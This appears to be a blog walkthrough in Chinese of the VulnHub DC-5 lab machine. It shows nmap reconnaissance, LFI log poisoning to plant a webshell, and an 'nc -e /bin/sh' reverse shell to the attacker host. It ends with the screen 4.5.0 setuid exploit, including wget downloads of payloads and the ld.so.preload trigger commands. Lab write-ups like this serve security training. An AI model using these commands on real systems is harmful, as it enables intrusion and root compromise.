vulnhub-dc-5
vulnhub第六个靶机
靶机地址: https://www.vulnhub.com/entry/dc-5,314/.
知识点
nmap
用nmap查询局域网内存活的主机,发现靶机ip
nmap -T4 192.168.40.0/24
用nmap进行更详细的探测,发现开着的端口和服务
端口 | 服务 |
---|---|
80 | http |
111 | rpcbind |
49800 | rpcbind |
LFI包含日志文件写马
端口:80——>web漏洞——>成功
访问主页发现都是一些文章,只找到一个可以写东西的页面,应该是突破口
提交数据以后进入到另一个页面,并且每刷新一次页面中下的年份就变化一次,猜测可能存在LFI漏洞
通过fuzz测试,发现包含语句为file=
从前面nmap的扫描得此站点的服务器为nginx,可以在url上写一句话木马,写到访问日志。再包含nginx访问日志,从而拿shell
这里要注意别直接在浏览器url上写马,木马会被进行url加密,从而使蚁剑连不上木马。可以用burp抓包再修改,再包含日志文件,用蚁剑连接
screen 4.5.0提权
用蚁剑进行nc反弹shell
nc -e /bin/sh 192.168.40.129 4444
python -c "import pty;pty.spawn('/bin/bash')" #打开一个标准shell
cat /etc/passwd
发现一个用户:dc
粗略的查看了没有sudo命令,邮件、备份文件、定时任务也没有,22端口是关闭的不能爆破。
最后在suid中找到了一个存在漏洞的工具screen
find / -type f -perm -u=s 2>/dev/null
在kali中寻找该漏洞的poc
searchsploit screen 4.5.0
将poc复制到桌面,开启http服务
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/
按提示生成.c文件并编译
在kali上开启http服务
python -m SimpleHTTPServer
靶机上下载
wget http://192.168.40.129:8000/libhax.so
wget http://192.168.40.129:8000/rootshell
执行脚本后面的命令
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
再回到/tmp上执行脚本,拿到root权限
ps:
个人站点博客:XingHe,欢迎来踩~